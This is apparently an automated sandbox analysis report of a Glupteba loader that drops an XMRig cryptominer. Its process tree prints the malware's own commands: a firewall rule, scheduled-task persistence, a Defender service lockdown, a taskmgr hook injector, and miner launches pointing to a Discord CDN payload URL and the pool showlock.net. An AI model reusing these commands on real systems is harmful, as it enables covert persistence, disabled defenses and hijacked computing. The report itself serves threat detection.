Analysis

  • max time kernel
    18s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    18-04-2024 22:49

General

  • Target

    7e4dfff458de19142e3560d55121881cf94872105c21c29e568de62a53cd77ac.exe

  • Size

    4.2MB

  • MD5

    1795078e20a91b11e2513be31204d3ef

  • SHA1

    42de327abdd5107e40b821f128c9749866a326db

  • SHA256

    7e4dfff458de19142e3560d55121881cf94872105c21c29e568de62a53cd77ac

  • SHA512

    3bdb04006e5831b0b3999c4fb3790e640b2a03c489599971a5a15e2099dfaeaed0439e1b9a19769247653905073ce4110386250af7ec1b489f5db3c847f1678b

  • SSDEEP

    98304:DsWc8naSrBchbGtEv0JHIgMwpxxX5hi9ihYSp8HC:YPUzBrIgMADi2p

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 38 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\7e4dfff458de19142e3560d55121881cf94872105c21c29e568de62a53cd77ac.exe
    "C:\Users\Admin\AppData\Local\Temp\7e4dfff458de19142e3560d55121881cf94872105c21c29e568de62a53cd77ac.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5076
    • C:\Users\Admin\AppData\Local\Temp\7e4dfff458de19142e3560d55121881cf94872105c21c29e568de62a53cd77ac.exe
      "C:\Users\Admin\AppData\Local\Temp\7e4dfff458de19142e3560d55121881cf94872105c21c29e568de62a53cd77ac.exe"
      2⤵
      • Windows security bypass
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4280
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:808
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4692
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:1012
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1916
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4700
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4320
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:4072
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /delete /tn ScheduledUpdate /f
          4⤵
            PID:3488
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1228
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4044
          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            4⤵
              PID:3052
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:824
            • C:\Windows\windefender.exe
              "C:\Windows\windefender.exe"
              4⤵
                PID:3044
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                  5⤵
                    PID:3080
                    • C:\Windows\SysWOW64\sc.exe
                      sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                      6⤵
                      • Launches sc.exe
                      PID:2468
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  4⤵
                    PID:5052
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                    4⤵
                      PID:5076
                      • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id dbeb1c6f-4ecf-46f1-903b-c0e55cfb05f1 --tls --nicehash -o showlock.net:443 --rig-id dbeb1c6f-4ecf-46f1-903b-c0e55cfb05f1 --tls --nicehash -o showlock.net:80 --rig-id dbeb1c6f-4ecf-46f1-903b-c0e55cfb05f1 --nicehash --http-port 3433 --http-access-token dbeb1c6f-4ecf-46f1-903b-c0e55cfb05f1 --randomx-wrmsr=-1
                        5⤵
                          PID:4744
                        • C:\Windows\rss\csrss.exe
                          C:\Windows\rss\csrss.exe -hide 4744
                          5⤵
                            PID:4132
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                                PID:4236
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            4⤵
                              PID:3840
                            • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                              C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                              4⤵
                                PID:2096
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                4⤵
                                  PID:3276
                                • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                  C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                  4⤵
                                    PID:5052
                            • C:\Windows\windefender.exe
                              C:\Windows\windefender.exe
                              1⤵
                                PID:2624

                              Network

                              MITRE ATT&CK Matrix ATT&CK v13

                              Execution

                              Scheduled Task/Job

                              1
                              T1053

                              Persistence

                              Create or Modify System Process

                              1
                              T1543

                              Windows Service

                              1
                              T1543.003

                              Boot or Logon Autostart Execution

                              1
                              T1547

                              Registry Run Keys / Startup Folder

                              1
                              T1547.001

                              Scheduled Task/Job

                              1
                              T1053

                              Privilege Escalation

                              Create or Modify System Process

                              1
                              T1543

                              Windows Service

                              1
                              T1543.003

                              Boot or Logon Autostart Execution

                              1
                              T1547

                              Registry Run Keys / Startup Folder

                              1
                              T1547.001

                              Scheduled Task/Job

                              1
                              T1053

                              Defense Evasion

                              Impair Defenses

                              3
                              T1562

                              Disable or Modify Tools

                              2
                              T1562.001

                              Disable or Modify System Firewall

                              1
                              T1562.004

                              Modify Registry

                              3
                              T1112

                              Discovery

                              Query Registry

                              2
                              T1012

                              System Information Discovery

                              1
                              T1082

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pwecwcde.zjn.ps1
                                Filesize

                                1B

                                MD5

                                c4ca4238a0b923820dcc509a6f75849b

                                SHA1

                                356a192b7913b04c54574d18c28d46e6395428ab

                                SHA256

                                6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                SHA512

                                4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                              • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                Filesize

                                2.8MB

                                MD5

                                713674d5e968cbe2102394be0b2bae6f

                                SHA1

                                90ac9bd8e61b2815feb3599494883526665cb81e

                                SHA256

                                f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

                                SHA512

                                e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

                              • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                                Filesize

                                2.0MB

                                MD5

                                dcb505dc2b9d8aac05f4ca0727f5eadb

                                SHA1

                                4f633edb62de05f3d7c241c8bc19c1e0be7ced75

                                SHA256

                                61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

                                SHA512

                                31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

                              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                Filesize

                                281KB

                                MD5

                                d98e33b66343e7c96158444127a117f6

                                SHA1

                                bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                SHA256

                                5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                SHA512

                                705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                              • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                                Filesize

                                5.2MB

                                MD5

                                4f649a57b7ddf3874c9a2163a73e9b07

                                SHA1

                                9c966520ba8233f13f168cade548baf5a30823ba

                                SHA256

                                830afffc7dd32e007736f0d97e8d02f68f80988266e68e3de3250aa189ac8491

                                SHA512

                                b2374bac551b0d4e87f38eb0090a9df0705a8600667fecba6a94e5c67ff93fc8b4707a905ce0e5ef0909e91b04dc01d74c21887a5b5958b8b2fd01faed253aac

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                Filesize

                                2KB

                                MD5

                                db01a2c1c7e70b2b038edf8ad5ad9826

                                SHA1

                                540217c647a73bad8d8a79e3a0f3998b5abd199b

                                SHA256

                                413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

                                SHA512

                                c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                Filesize

                                41KB

                                MD5

                                0f38a17bbaa7b6f75f51c671be981097

                                SHA1

                                ee95e5225cfb623b6ddd58902bf72504993e2030

                                SHA256

                                03f4d293b34e18f429d34282179a04a705d448f3b88b88982486997f6cd51f39

                                SHA512

                                429100ae213ea857fa3fefea7b512bb616219f76cf2a55a4735776650806d42582ff886cd4779a1406d2bc9d0f514c93e40c3d12d9e764ffa8b880067bd704a2

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                Filesize

                                18KB

                                MD5

                                151c2ccd2a90c70193ca0a3f77048ffb

                                SHA1

                                e191e886e25fa443184580f1f65bef09e7fd8446

                                SHA256

                                08580c013a6ba611dc1b9ba7e7b2bd81d8aedcb6d5b459ca3522afdc7f57a5c8

                                SHA512

                                a4428d8d3427a619b4f3c2857cfcb8724d35667e4a1f60f95454e6f45b717203605eb9f1411ff8502bd699725ea49caa6433e89ddffb475b9a159639d968edd1

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                Filesize

                                18KB

                                MD5

                                6b431a68db5603ae5d79fa5559128fd2

                                SHA1

                                246528e601c026ebba17f56a2986bdf546b76c65

                                SHA256

                                a14acc139fad695eae9ff81643e93cbfd4c460a5e87eefd8f6bb36baa95b3714

                                SHA512

                                65b5d229bf92a85ca3fcda96e78b0cb428b4c279473d9c68e588c2fd5d25ed5f4167a4b54b34e59828e3f33a7967f2f478d2236234f735ba8a84c0e80bb6ae06

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                Filesize

                                18KB

                                MD5

                                f7d6bb6f88c8d6de2fd17c176f82b8d6

                                SHA1

                                e3ae613727267b65f86ef479a5ddcfa29f9218ab

                                SHA256

                                77b81b64f6b52316e738374849f37a975af213d4fc35167e0443ac2085b1f037

                                SHA512

                                163d8cdcaefd6dfa49907472e5ae39b2e322301c863edd1975abf94aaf4aeb30d0823e89e53730ccf9b4504f07aa001cdfea85e5075d907aa4aa20a9f9d32658

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                Filesize

                                18KB

                                MD5

                                91e4575e88e1849ad001a565f0960dbc

                                SHA1

                                88dc974519c4e76d7ba71a5a3b106c709b752324

                                SHA256

                                9a430181cd9d57dca53ba97b599df7a5b542d33b4aeffa85c958be7f0d011d66

                                SHA512

                                7e430ff3b29f5171c3e41c002ddefd8c27173c630de4ba11a1b54affbea1dd7b3bad19f6b55c7afdd58a2deab57150f0647cb608485c0a07137ceec99a155703

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                Filesize

                                18KB

                                MD5

                                bb735efb39973069f1600c4799e71a56

                                SHA1

                                f2817f962bf51245972eb1798c69ace4bf9190fa

                                SHA256

                                a72ddb37a0a299aa7d947e6ea99a0afb5d3fb7d17b8bb1f30b1cf310f18db97a

                                SHA512

                                335ad78c51292dea55bccc860d00fd815893af554764727878b5c869b9451a86bf8d561e5f4fee02cd9f13636538f90dccaaece68d17c1fb848b5cdf673ccc88

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                Filesize

                                18KB

                                MD5

                                f734772cbafd8d9f70a0cc38c6093bea

                                SHA1

                                a16a3b33619a90accf31c22c08353d49657102d0

                                SHA256

                                30e5a85263deed71b9eef0e4bdaed01de649eef328fcb12bfed7b24e5c63f496

                                SHA512

                                69fcfda51093f4f02eeaad274febbf3ffab53fda0b53d1b1975a5a322df8abaa888a722c6f6a509b5d5d5ec7f93ed1e664a4d8987929e6c8bdae7ec2511464f2

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                Filesize

                                17KB

                                MD5

                                805bc08f5242660cc2c582502e2a2938

                                SHA1

                                2fb010cd3e2a82a6033a85d38f90847d148e78b4

                                SHA256

                                81056054bc2516fedc583a1c2cf5f250e9a50ecf1a046f3a0e08be14d3fe9fe5

                                SHA512

                                60091dbe347462b4cc64ef30b95bb9cd914fb004cd2384fbd1cb137dab0b89044abf27a4dd5c7301d32051fa6bd59bbb67ff49fca8a4a310cc753a59458358c3

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                Filesize

                                18KB

                                MD5

                                a6d418001429f694ed18eda5cf4d0075

                                SHA1

                                8d64082e569fd29beebbdeff654ad1cea4d62bb9

                                SHA256

                                02e92898f6605536e4657a7a1132a5886500e0ba07973246675f720bb025e6dd

                                SHA512

                                c2a75e4935701a00d3723b33236dbd2dd173b3aa1be527619499a5dcd98a7708ff7de7a98dbd252510c8f504f2803962d19f0824cad17ab839abd6e2cc35394f

                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                Filesize

                                18KB

                                MD5

                                e3fb7793aafc770e4e2cedbfa55eb554

                                SHA1

                                53c0636de99465e90d0e0c22b1b099e6725cf4d1

                                SHA256

                                1aab10dbd64f6f64302e507b699d310b6e7761fc1ba49a6a01e2dc6cd5db643b

                                SHA512

                                24a5737743585db7f71657ba9fc7583aa026570200b970c6f93e628bf9bb73cdad01bc48eeb9e9ff817852e440bed7dd850509a1042d0fb4e588a4b9dd543219

                              • C:\Windows\rss\csrss.exe
                                Filesize

                                4.2MB

                                MD5

                                1795078e20a91b11e2513be31204d3ef

                                SHA1

                                42de327abdd5107e40b821f128c9749866a326db

                                SHA256

                                7e4dfff458de19142e3560d55121881cf94872105c21c29e568de62a53cd77ac

                                SHA512

                                3bdb04006e5831b0b3999c4fb3790e640b2a03c489599971a5a15e2099dfaeaed0439e1b9a19769247653905073ce4110386250af7ec1b489f5db3c847f1678b

                              • C:\Windows\windefender.exe
                                Filesize

                                2.0MB

                                MD5

                                8e67f58837092385dcf01e8a2b4f5783

                                SHA1

                                012c49cfd8c5d06795a6f67ea2baf2a082cf8625

                                SHA256

                                166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

                                SHA512

                                40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

                              • memory/808-338-0x0000000006D30000-0x0000000006D40000-memory.dmp
                                Filesize

                                64KB

                              • memory/808-311-0x00000000733F0000-0x0000000073ADE000-memory.dmp
                                Filesize

                                6.9MB

                              • memory/808-310-0x00000000079A0000-0x0000000007CF0000-memory.dmp
                                Filesize

                                3.3MB

                              • memory/808-308-0x0000000006D30000-0x0000000006D40000-memory.dmp
                                Filesize

                                64KB

                              • memory/808-309-0x0000000006D30000-0x0000000006D40000-memory.dmp
                                Filesize

                                64KB

                              • memory/808-312-0x0000000007EC0000-0x0000000007F0B000-memory.dmp
                                Filesize

                                300KB

                              • memory/808-337-0x0000000009410000-0x00000000094B5000-memory.dmp
                                Filesize

                                660KB

                              • memory/808-332-0x0000000070190000-0x00000000704E0000-memory.dmp
                                Filesize

                                3.3MB

                              • memory/808-331-0x0000000070120000-0x000000007016B000-memory.dmp
                                Filesize

                                300KB

                              • memory/808-548-0x00000000733F0000-0x0000000073ADE000-memory.dmp
                                Filesize

                                6.9MB

                              • memory/1916-574-0x000000007E920000-0x000000007E930000-memory.dmp
                                Filesize

                                64KB

                              • memory/1916-552-0x00000000733F0000-0x0000000073ADE000-memory.dmp
                                Filesize

                                6.9MB

                              • memory/1916-553-0x0000000006850000-0x0000000006860000-memory.dmp
                                Filesize

                                64KB

                              • memory/1916-554-0x0000000007930000-0x0000000007C80000-memory.dmp
                                Filesize

                                3.3MB

                              • memory/1916-581-0x0000000006850000-0x0000000006860000-memory.dmp
                                Filesize

                                64KB

                              • memory/1916-575-0x0000000070120000-0x000000007016B000-memory.dmp
                                Filesize

                                300KB

                              • memory/1916-576-0x0000000070170000-0x00000000704C0000-memory.dmp
                                Filesize

                                3.3MB

                              • memory/1916-790-0x00000000733F0000-0x0000000073ADE000-memory.dmp
                                Filesize

                                6.9MB

                              • memory/2212-1827-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1797-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1803-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1805-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1807-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1809-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1811-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1813-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1815-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1817-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1819-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1821-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1823-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1825-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1829-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1857-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1799-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1801-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-2281-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1795-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1793-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1791-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-2596-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1789-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1787-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1776-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1785-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-2474-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1043-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/2212-1040-0x0000000005200000-0x00000000055F9000-memory.dmp
                                Filesize

                                4.0MB

                              • memory/2624-1786-0x0000000000400000-0x00000000008DF000-memory.dmp
                                Filesize

                                4.9MB

                              • memory/2624-1790-0x0000000000400000-0x00000000008DF000-memory.dmp
                                Filesize

                                4.9MB

                              • memory/3044-1783-0x0000000000400000-0x00000000008DF000-memory.dmp
                                Filesize

                                4.9MB

                              • memory/4132-2354-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/4132-2624-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/4132-2630-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/4280-307-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/4280-815-0x0000000004D50000-0x0000000005157000-memory.dmp
                                Filesize

                                4.0MB

                              • memory/4280-1037-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/4280-304-0x0000000004D50000-0x0000000005157000-memory.dmp
                                Filesize

                                4.0MB

                              • memory/4280-821-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/4320-1045-0x0000000007750000-0x0000000007AA0000-memory.dmp
                                Filesize

                                3.3MB

                              • memory/4320-1046-0x0000000073350000-0x0000000073A3E000-memory.dmp
                                Filesize

                                6.9MB

                              • memory/4320-1044-0x0000000000940000-0x0000000000950000-memory.dmp
                                Filesize

                                64KB

                              • memory/4320-1048-0x0000000007C50000-0x0000000007C9B000-memory.dmp
                                Filesize

                                300KB

                              • memory/4472-3-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/4472-301-0x0000000000400000-0x000000000311B000-memory.dmp
                                Filesize

                                45.1MB

                              • memory/4472-303-0x0000000005130000-0x0000000005A1B000-memory.dmp
                                Filesize

                                8.9MB

                              • memory/4472-2-0x0000000005130000-0x0000000005A1B000-memory.dmp
                                Filesize

                                8.9MB

                              • memory/4472-1-0x0000000004D20000-0x0000000005128000-memory.dmp
                                Filesize

                                4.0MB

                              • memory/4700-1033-0x00000000733F0000-0x0000000073ADE000-memory.dmp
                                Filesize

                                6.9MB

                              • memory/4700-795-0x0000000006EE0000-0x0000000006EF0000-memory.dmp
                                Filesize

                                64KB

                              • memory/4700-794-0x0000000006EE0000-0x0000000006EF0000-memory.dmp
                                Filesize

                                64KB

                              • memory/4700-793-0x00000000733F0000-0x0000000073ADE000-memory.dmp
                                Filesize

                                6.9MB

                              • memory/4700-816-0x0000000070120000-0x000000007016B000-memory.dmp
                                Filesize

                                300KB

                              • memory/4700-817-0x0000000070170000-0x00000000704C0000-memory.dmp
                                Filesize

                                3.3MB

                              • memory/4700-822-0x000000007E3B0000-0x000000007E3C0000-memory.dmp
                                Filesize

                                64KB

                              • memory/4700-824-0x0000000006EE0000-0x0000000006EF0000-memory.dmp
                                Filesize

                                64KB

                              • memory/4744-2184-0x0000026E8AA40000-0x0000026E8AA60000-memory.dmp
                                Filesize

                                128KB

                              • memory/5076-84-0x0000000009B20000-0x0000000009BB4000-memory.dmp
                                Filesize

                                592KB

                              • memory/5076-2181-0x0000000000400000-0x00000000008E1000-memory.dmp
                                Filesize

                                4.9MB

                              • memory/5076-83-0x0000000000920000-0x0000000000930000-memory.dmp
                                Filesize

                                64KB

                              • memory/5076-74-0x00000000098C0000-0x00000000098F3000-memory.dmp
                                Filesize

                                204KB

                              • memory/5076-75-0x0000000070000000-0x000000007004B000-memory.dmp
                                Filesize

                                300KB

                              • memory/5076-76-0x0000000070050000-0x00000000703A0000-memory.dmp
                                Filesize

                                3.3MB

                              • memory/5076-82-0x0000000009900000-0x00000000099A5000-memory.dmp
                                Filesize

                                660KB

                              • memory/5076-77-0x00000000098A0000-0x00000000098BE000-memory.dmp
                                Filesize

                                120KB

                              • memory/5076-66-0x0000000008A80000-0x0000000008AF6000-memory.dmp
                                Filesize

                                472KB

